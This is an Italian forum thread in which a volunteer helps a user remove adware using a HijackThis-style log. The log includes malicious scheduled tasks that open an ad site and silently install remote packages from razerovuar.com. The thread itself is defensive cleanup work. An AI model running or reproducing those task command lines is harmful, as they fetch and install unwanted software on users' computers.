O22 - Task: \Microsoft\Windows\LanguageComponentsInstaller\ReconcileLanguageResources - {D0582E3B-3126-4CAA-9155-AC37C912A489} - C:\WINDOWS\System32\LanguageOverlayServer.dll (Microsoft)
O22 - Task: \Microsoft\Windows\Speech\HeadsetButtonPress - C:\WINDOWS\system32\speech_onecore\common\SpeechRuntime.exe StartedFromTask (Microsoft)
O22 - Task: \Microsoft\Windows\WaaSMedic\PerformRemediation - {72566E27-1ABB-4EB3-B4F0-EB431CB1CB32},None - C:\WINDOWS\System32\WaaSMedicSvc.dll (Microsoft)
O22 - Task: \Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance - C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1807.18075-0\MpCmdRun.exe -IdleTask -TaskName WdCacheMaintenance
O22 - Task: \Microsoft\Windows\Windows Defender\Windows Defender Cleanup - C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1807.18075-0\MpCmdRun.exe -IdleTask -TaskName WdCleanup
O22 - Task: \Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan - C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1807.18075-0\MpCmdRun.exe Scan -ScheduleJob -ScanTrigger 55
O22 - Task: \Microsoft\Windows\Windows Defender\Windows Defender Verification - C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1807.18075-0\MpCmdRun.exe -IdleTask -TaskName WdVerification
O22 - Task: {6C6DDEFF-6E7F-5338-C25F-129A03293CE8} - C:\Program Files\Mozilla Firefox\firefox.exe http://bl0ging.net/cl/?guid=5c5dcxldjds502caat9e68kbgbrtujoq&prid=1&pid=5_1301_13022
O22 - Task: {C5AAA592-0D58-4DB3-9351-3F3D577131EA} - C:\Program Files (x86)\Common Files\PiaOionoeAujq.exe /q /i http://razerovuar.com/zhqb5ohaemej.ymx (file missing)
O22 - Task: {CBEF6C52-1AA7-8D65-8643-7FD85CA451F9} - C:\Users\saras\AppData\Local\GHUOiOAWZIumE.exe /q /i http://razerovuar.com/qdhqzedavfwp.qya (file missing)
O23 - Service R2: Apple Mobile Device Service - C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
O23 - Service R2: HP Network Devices Support - (HPSLPSVC) - C:\WINDOWS\system32\svchost.exe -k HPService; "ServiceDll" = C:\Program Files (x86)\HP\Digital Imaging\bin\HPSLPSVC64.DLL
O23 - Service R2: IMF Service - (IMFservice) - C:\Program Files (x86)\IObit\IObit Malware Fighter\IMFSrv.exe
O23 - Service R2: NVIDIA Display Container LS - (NVDisplay.ContainerLocalSystem) - C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe -s NVDisplay.ContainerLocalSystem -f "C:\ProgramData\NVIDIA\NVDisplay.ContainerLocalSystem.log" -l 3 -d "C:\Program Files\NVIDIA Corporation\Display.NvContainer\plugins\LocalSystem" -r -p 30000
O23 - Service R2: Servizio Windows Defender Antivirus - (WinDefend) - C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1807.18075-0\MsMpEng.exe
O23 - Service R2: Servizio di rilevamento dispositivi HP CUE - (hpqddsvc) - C:\WINDOWS\SysWow64\svchost.exe -k hpdevmgmt; "ServiceDll" = C:\Program Files (x86)\HP\Digital Imaging\bin\hpqddsvc.dll
O23 - Service R3: Servizio Controllo rete di Windows Defender Antivirus - (WdNisSvc) - C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1807.18075-0\NisSrv.exe
O23 - Service R3: hpqcxs08 - C:\WINDOWS\SysWow64\svchost.exe -k hpdevmgmt; "ServiceDll" = C:\Program Files (x86)\HP\Digital Imaging\bin\hpqcxs08.dll
O23 - Service S2: IObit Uninstaller Service - (IObitUnSvr) - C:\Program Files (x86)\IObit\IObit Uninstaller\IUService.exe
O23 - Service S2: Net Driver HPZ12 - C:\WINDOWS\System32\svchost.exe -k HPZ12; "ServiceDll" = C:\Windows\System32\HPZinw12.dll
O23 - Service S2: Origin Web Helper Service - C:\Program Files (x86)\Origin\OriginWebHelperService.exe
O23 - Service S2: Pml Driver HPZ12 - C:\WINDOWS\System32\svchost.exe -k HPZ12; "ServiceDll" = C:\Windows\System32\HPZipm12.dll
O23 - Service S3: Servizio Windows Defender Advanced Threat Protection - (Sense) - C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe
O23 - Service S3: Servizio iPod - (iPod Service) - C:\Program Files\iPod\bin\iPodService.exe
O23 - Service S3: Steam Client Service - C:\Program Files (x86)\Common Files\Steam\SteamService.exe /RunAsService


--
End of file - Time spent: 18 sec. - 28704 bytes, CRC32: FFFFFFFF. Sign: 镎Ὕ
Torna in alto
 
cbbusto
Inviato: Friday, September 21, 2018 11:17:35 PM

Rank: AiutAmico

Iscritto dal : 11/8/2008
Posts: 13,964
Hai eliminato solo SmartDefrag, razerovuar c'è ancora anche se è un file missing, le altre pulizie non hanno trovato niente, la pulizia del Registro con E.F.R.C. non ha trovato niente ?
Torna in alto
 
Viky68
Inviato: Saturday, September 22, 2018 9:16:33 PM

Rank: AiutAmico

Iscritto dal : 1/30/2003
Posts: 272
Ho effettuato la scansione con E.F.R.C. rimosso 450 voci
Devo effettuarne un'altra?
Torna in alto
 
cbbusto
Inviato: Sunday, September 23, 2018 12:11:42 AM

Rank: AiutAmico

Iscritto dal : 11/8/2008
Posts: 13,964
Viky68 ha scritto:
Ho effettuato la scansione con E.F.R.C. rimosso 450 voci
Devo effettuarne un'altra?


No non serve, come va il pc è ancora lento e appaiono ancora pagine pubblicitarie ? fai sapere.Ciao
Torna in alto
 
Viky68
Inviato: Sunday, September 23, 2018 6:28:46 PM

Rank: AiutAmico

Iscritto dal : 1/30/2003
Posts: 272
Ciao,e' migliorato molto non appaiaono piu' pagine nel browser senza motivo. anche la fluidita' di sistema sembra tornata come prima che venisse infettato.
Devo postare il log per sicurezza?
Torna in alto
 
cbbusto
Inviato: Sunday, September 23, 2018 11:15:59 PM

Rank: AiutAmico

Iscritto dal : 11/8/2008
Posts: 13,964
No non occorre, se il pc funziona sei a posto, presta attenzione quando installi nuovi programmi che non ci siano dei software aggiuntivi che ti portano a siti di pubblicità. Ciao
Torna in alto
 
Viky68
Inviato: Monday, September 24, 2018 3:52:42 PM

Rank: AiutAmico

Iscritto dal : 1/30/2003
Posts: 272
Grazie per il tuo aiuto e i preziosi consigli
Torna in alto
 
Utenti presenti in questo topic
Guest

Aiutamici Forum » FORUM - Istruzioni e Guide » Sicurezza VIRUS » controllo log HIJACK


Salta al Forum
Aggiunta nuovi Topic disabilitata in questo forum.
Risposte disabilitate in questo forum.
Eliminazione tuoi Post disabilitata in questo forum.
Modifica dei tuoi post disabilitata in questo forum.
Creazione Sondaggi disabilitata in questo forum.
Voto ai sondaggi disabilitato in questo forum.

Main Forum RSS : RSS

Aiutamici Theme
Powered by Yet Another Forum.net versione 1.9.1.8 (NET v2.0) - 3/29/2008
Copyright © 2003-2008 Yet Another Forum.net. All rights reserved.